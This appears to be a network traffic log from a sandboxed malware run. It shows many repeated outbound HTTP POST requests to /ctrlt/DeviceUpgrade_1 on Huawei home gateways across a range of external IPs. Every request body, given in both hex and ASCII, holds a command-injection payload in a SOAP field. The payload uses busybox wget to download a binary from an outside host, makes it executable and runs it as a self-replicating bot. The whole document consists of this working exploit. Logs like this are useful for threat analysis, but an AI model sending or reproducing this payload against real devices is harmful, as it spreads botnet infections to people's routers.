                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  928192.168.2.1344268138.153.183.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445923090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  929192.168.2.1350318197.135.152.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445941925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  930192.168.2.135923241.19.91.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445957899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  931192.168.2.1358122157.242.63.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.446300030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  932192.168.2.1352104197.158.40.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.446367025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  933192.168.2.135711441.152.38.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.446369886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  934192.168.2.1350920145.254.11.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.446422100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  935192.168.2.1343298157.244.116.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.446650982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  936192.168.2.1339202157.77.100.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.446669102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  937192.168.2.1334930157.165.240.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.446693897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 